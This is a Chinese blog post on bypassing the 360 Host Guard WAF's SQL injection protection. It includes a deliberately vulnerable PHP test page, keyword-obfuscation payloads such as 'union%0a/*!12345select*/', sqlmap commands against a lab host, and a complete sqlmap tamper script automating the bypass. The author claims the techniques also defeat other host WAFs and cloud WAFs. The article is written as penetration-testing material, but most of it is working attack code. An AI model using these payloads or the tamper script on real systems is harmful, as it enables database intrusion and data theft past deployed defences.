【SQL注入技巧拓展】————14、Bypass 360主机卫士SQL注入防御(附tamper脚本)

最新推荐文章于 2024-01-18 21:36:19 发布
最新推荐文章于 2024-01-18 21:36:19 发布
阅读量446 收藏 1
点赞数
分类专栏: 【渗透测试拓展】 # SQL注入拓展

0x01 前言

  在测试过程中,经常会遇到一些主机防护软件,对这方面做了一些尝试,可成功bypass了GET和POST的注入防御,分享一下姿势。

0x02 环境搭建

Windows Server 2003+phpStudy

sql注入点测试代码:

sql.php

<?php
$con = mysql_connect("localhost","root","root");
if (!$con)
  {
  die('Could not connect: ' . mysql_error());
  }
mysql_select_db("test", $con);
$id = $_REQUEST[ 'id' ];
$query  = "SELECT * FROM admin WHERE username = $id ";
$result = mysql_query($query);
while($row = mysql_fetch_array($result))
  {
  echo $row['0'] . " " . $row['1'];
  echo "<br />";
  }
echo "<br/>";
echo $query;
mysql_close($con);
?>

运行效果:

0x03 Bypass 过程

对不同waf做了一些尝试,关于SQL注入bypass,可以考虑划分为3种:

  • 完全bypass(union select+select from)
  • 部分bypass(union select 或select from)
  • 获取一些敏感信息(如version()、database()等)     

A、Union+select

先考虑如何绕过union+select,可以考虑一下几种形式

  • 最常见形式 %20、+、/**/
  • Mysql中可以利用的空白字符有:%09,%0a,%0b,%0c,%0d,%20,%a0
  • 内联注释   /!12345select/

 通过组合测试,可以发现 union%0a/*!12345select*/ 1,2 可以绕过防御。

B、select+from

  select+from 也可以通过同样的组合形式绕过防御。

  至此已完全绕过union+select+from。

0x04 自动化注入

编写tamper bypass脚本,来利用sqlmap来跑数据

先看一下原始sqlmap的效果:

sqlmap.py -u  http://192.168.106.130/config/sql.php?id=1  --flush-session --dbs   失败

加载tamper脚本,可成功获取数据。

sqlmap.py -u http://192.168.106.130/config/sql.php?id=1 --flush-session  --technique=U --tamper="360safe.py" --dbs

tamper脚本:

#!/usr/bin/env python

"""
write by Aaron
"""
from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING
__priority__ = PRIORITY.LOW
def dependencies():
    pass
def tamper(payload, **kwargs):
    """
    Replaces keywords
    >>> tamper('UNION SELECT id FROM users')
    'union%0a/*!12345select*/id%0a/*!12345from*/users'
    """
    if payload:
        payload=payload.replace(" ALL SELECT ","%0a/*!12345select*/")
        payload=payload.replace("UNION SELECT","union%0a/*!12345select*/")
        payload=payload.replace(" FROM ","%0a/*!12345from*/")
        payload=payload.replace("CONCAT","CONCAT%23%0a")
        payload=payload.replace("CASE ","CASE%23%0a")
        payload=payload.replace("CAST(","/*!12345CASt(*/")
        payload=payload.replace("DATABASE()","database%0a()")
                
    return payload

这边主要是针对union select查询进行的关键字替换,测试过程中,可以发现利用tamper脚本来bypass的弊端,sqlmap的部分payload是固定的,部分关键字会被waf拦截,需要一步步调试,总结,测试哪些关键字是被拦截的,如何绕过关键字的检测等,还是挺麻烦。

0x05 END

最好的自动化注入工具:可以考虑自己编写一个自动化注入工具,灵活的自定义payload来获取数据库信息。
目前的测试成果,可成功bypass注入防御,如 安全狗、云锁、360主机卫士、D盾_IIS防火墙等主机防护软件及各种云waf,有些姿势都在用。

FLy_鹏程万里
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
360数据库防注入
01-06
360提供的防sql注入 php类库 直接在php文件开头加入include('360_safe3.php'),修正正则表达式,匹配更多的sql关键字
360_safe3通用XSS/SQL防注入源代码(ASP/PHP/C#ASP.NET)
09-06
360_safe3通用XSS/SQL防注入源代码(ASP/PHP/C#ASP.NET),下载后,每个开发语言都对应着使用办法,一般是在全站文档中INCLUDE使用。已核实,代码可用且有效,更新到最新版。
sql注入tamper绕过WAF防火墙
weixin_33974433的博客
07-31 401
### 现象: 当我们注入的时候,发现有狗,有waf,真的是我的小心脏都碎掉了!!但是呢,很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过。利用sqlmap中的tamper给我们带来了很多防过滤的脚本绕过。 提示“输入内容存在危险字符,已经被拦截” 提示“请不要尝试在参数中包含非法字符尝试注入” ### 判断我们使用那种脚本 1,id...
sqlmap注入tamper绕过WAF防火墙过滤
热门推荐
ru_li的专栏
05-19 1万+
每当注入的时候看到这个贱贱的提示框,内心有千万只草泥马在奔腾。   但很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过。 sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可能有的朋友还不知道怎样才能最有效的利用tamper脚本。 当然使用脚本之前需要确定的就是系统过滤了哪些关键字,比如单引号、空格、select、union、admin等等。 所以
sql 数据类型注入+tamper
2202_75317918的博客
12-15 521
(开发程序里面,数字不需要单引号,字符需要单引号 双引号去概括的需要考虑到符号的闭合 才能正确去执行SQL 完成SQL注入)我在本地尝试了编码型base64。
第07篇:Bypass 360主机卫士SQL注入防御(多姿势)1
08-03
然而,任何防御系统都有可能被绕过,以下将详细探讨如何绕过360主机卫士SQL注入防御。 ### 0x02 WAF测试 **姿势一:网站后台白名单** 360主机卫士允许设定特定的后台路径作为白名单,不会对其进行过滤。通过利用...
第四篇:Bypass 360主机卫士SQL注入防御(多姿势)1
08-03
本文主要探讨了如何规避360主机卫士SQL注入防御措施,针对的是360主机卫士Apache纪念版。SQL注入是一种常见的Web应用安全漏洞,攻击者通过构造恶意SQL语句,欺骗服务器执行非预期的数据库操作,获取敏感数据或篡改...
Bypass 360主机卫士SQL注入防御(多姿势).pdf
12-21
Bypass 360主机卫士SQL注入防御(多姿势) 从服务器客户端领域,曾经出现过一款360主机卫士,目前已停止更新和维护,官网都打不开了,但服务器中依然经常可以看到它的身影。本文主要分享了几种思路,Bypass 360主机...
第五篇:Bypass 护卫神SQL注入防御(多姿势)1
08-03
本文主要探讨了如何绕过护卫神·入侵防护系统的SQL注入防御,提供了多种策略和技巧。护卫神是一款专注于服务器安全的产品,其SQL防注入功能旨在保护服务器免受SQL注入攻击。以下是对每种Bypass方法的详细解释: 1. ...
第10篇:Bypass 护卫神SQL注入防御(多姿势)1
08-03
SQL注入防御与绕过策略】 SQL注入是一种常见的网络安全攻击手法,通过在Web应用程序的输入字段中插入恶意的SQL代码,以获取、修改、删除数据库中的敏感信息或控制服务器。在本文中,我们将探讨如何绕过护卫神·...
sql注入-WAF绕过】编写sqlmap的tamper进行sql注入
06-29 6146
【特征】特殊符号+十六进制格式
SQL注入实战————2、SQLmap中的temper使用
Fly_鹏程万里
05-06 2636
SQLmap——tamper注入靶机地址:http://219.153.49.228:42272/show.php?id=MQ==首先可以看到该URL中存在一个参数“MQ==”,从参数的格式来看是通过了base64进行了加密,那么我们可以对其进行base64解密发现解密之后的参数为1,这种类型的注入除了和我们以前的普通注入相比只是多了一个“base64”加密的过程,下面使用sqlmap的tampe...
SQL注入及其bypass
qq_45944626的博客
08-24 1568
SQL注入及其bypassSQL注入整数型注入字符型注入报错注入布尔盲注时间盲注cookie注入UA注入bypass常用函数罕见函数代替空格特殊符号绕过WAF SQL注入 整数型注入 加入单引号 语句出错,不会回显 加and 1=1 语句执行正常,返回一般页面 加and 1=2 语句正常运行,返回原网页,但无法查询结果 id=1 order by 1 查询数据库长度,若为2 id=-1 union select 1,2 查看回显位置,若为1,2,则可在1,2处添加查询语句 id=-1 unio
day27 SQL注入&Tamper脚本
wanjia01的博客
10-15 903
小迪安全笔记
day27WEB攻防-通用漏洞&SQL注入&常见SQL注入类型&Tamper脚本的使用
最新发布
m0_69583059的博客
01-18 1469
如果在实战中我们遇到了这样的问题应该如何解决,这里我们可以采用宽字节绕过,就是借助一些繁体字符或者乱码字符来占用字节位数,从而尝试绕过,例如,如果对单引号'进行了转义,我们可以通过在单引号前面加上%df来占用转义符号,没有了转义字符传入的数据就是正常的了。开发程序里面,数字不需要单引号,字符需要单引号,双引号去概括的,在注入的时候,需要考虑到符号的闭合,才能正确去执行SQL,完成注入。在注入的过程中,会遇到一些复杂的注入(waf绕过,过滤,编码等),tamper脚本可以尝试绕过。
第27天:WEB攻防-通用漏洞&SQL注入&Tamper脚本&Base64&Json&md5等
wuqingsix的博客
11-19 522
不同payload类型的注入方式构造:字符型,搜索形 ,加密,编码形。宽字节的构造和绕过, sqlmap的tamper字典使用
记一次sql注入分析与绕过【一】
good good study
07-31 514
sql手工注入实战项目,tamper脚本编写
sqlmap的使用 ---- 自带绕过脚本tamper
weixin_44110913的博客
09-27 682
sqlmap在默认的的情况下除了使用char()函数防止出现单引号,没有对注入的数据进行修改,还可以使用–tamper参数对数据做修改来绕过waf等设备。 0x01 命令如下 sqlmap -u [url] --tamper [模块名]1 sqlmap的绕过脚本在目录usr/share/golismero/tools/sqlma...
SQLMap——Tamper学习
weixin_44522540的博客
05-03 2813
一、简介 sqlmap是一款用来检测与利用SQL注入漏洞的免费工具,不仅可以实现SQL注入漏洞的检测和利用的自动化处理,自带的Tamper脚本可以帮助我们绕过IDS/WAF的检测。 二、Tamper脚本 部分Tamper脚本如图: 虽然sqlmap提供了许多Tamper脚本,但实际使用过程中网站可能过滤了许多敏感字符和相关函数,这就需要我们能够针对防护规则手动构建相应的Tamper脚本。 三、Tamper结构 #!/usr/bin/env python  """ Copyright (c) 20
深入理解SQL注入:攻击、防御与工具解析
"该资源为一个关于高级SQL注入的课程,涵盖了各种数据库的注入类型,如select、insert、json注入等,并讲解了如何防御和绕过SQL注入的策略。课程内容涉及SQL注入的基础知识,包括定义、实例、危害,以及针对Access、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值